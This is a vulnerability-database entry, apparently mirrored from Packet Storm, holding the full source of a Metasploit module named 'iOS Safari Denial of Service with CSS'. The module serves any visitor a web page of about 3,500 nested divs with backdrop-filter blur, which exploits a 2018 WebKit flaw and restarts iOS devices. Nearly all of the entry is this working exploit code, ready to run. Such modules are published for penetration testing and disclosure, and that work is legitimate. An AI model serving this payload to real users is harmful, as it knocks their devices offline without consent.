iOS Safari Denial of Service with CSS

🗓️ 31 Aug 2024 00:00:00Reported by Sabri Haddouche, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 230 Views

iOS Safari Denial of Service with CSS. Exploits vulnerability in WebKit on Apple iOS, causing device restart after viewing webpage

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpServer  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => "iOS Safari Denial of Service with CSS",  
'Description' => %q(  
This module exploits a vulnerability in WebKit on Apple iOS.  
If successful, the device will restart after viewing the webpage.  
),  
'License' => MSF_LICENSE,  
'Author' => [  
'Sabri Haddouche', # twitter.com/pwnsdx  
],  
'References' => [  
['URL', 'https://twitter.com/pwnsdx/status/1040944750973595649'],  
['URL', 'https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea'],  
['URL', 'https://nbulischeck.github.io/apple-safari-crash'],  
],  
'DisclosureDate' => '2018-09-15',  
)  
)  
end  
  
def run  
exploit  
end  
  
def on_request_uri(cli, request)  
print_status("#{cli.peerhost}: Sending response to User-Agent: #{request['User-Agent']}")  
html = %|  
<html>  
<head>  
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>  
<style>  
div {  
backdrop-filter: blur(10px);  
-webkit-backdrop-filter: blur(10px);  
width:10000px; height:10000px;  
}  
</style>  
</head>  
<body>  
#{'<div>' * 3500 + '</div>' * 3500}  
</body>  
</html>  
|  
send_response(cli, html)  
end  
end  
`

31 Aug 2024 00:00Current

7.4High risk

Vulners AI Score7.4